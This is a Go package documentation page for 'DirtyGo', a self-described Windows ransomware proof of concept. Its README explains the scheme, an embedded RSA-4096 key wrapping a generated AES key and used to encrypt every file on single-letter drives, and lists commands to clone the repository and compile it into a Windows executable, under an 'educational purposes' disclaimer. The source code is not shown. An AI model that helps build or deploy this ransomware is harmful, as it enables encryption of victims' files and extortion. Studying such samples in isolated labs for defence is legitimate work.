dirtygo

command module
v0.0.0-...-bcd4109 Latest Latest
Warning

This package is not in the latest version of its module.

Go to latest
Published: Jan 23, 2023 License: MIT Imports: 13 Imported by: 0

README

DirtyGo

Windows Ransomware - Proof of Concept

This is for educational purposes - author is not responsible for any damage.

Use with caution.

Run on Virtual Machine.

How it works?

RSA 4096b public key is base64 encoded as string. On start, we generate 32bits token for AES encryption, that we encrypt with rsa public key and save. We search for single-character partitions, and encrypt every file with AES.

How to build

git clone https://github.com/alx3dev/DirtyGo.git
cd DirtyGo
go mod init dirty_go
go mod tidy
GOOS=windows go build dirty.go
// => dirty.exe

Available as gist

Documentation

The Go Gopher

There is no documentation for this package.

Jump to

Keyboard shortcuts

? : This menu
/ : Search site
f or F : Jump to
y or Y : Canonical URL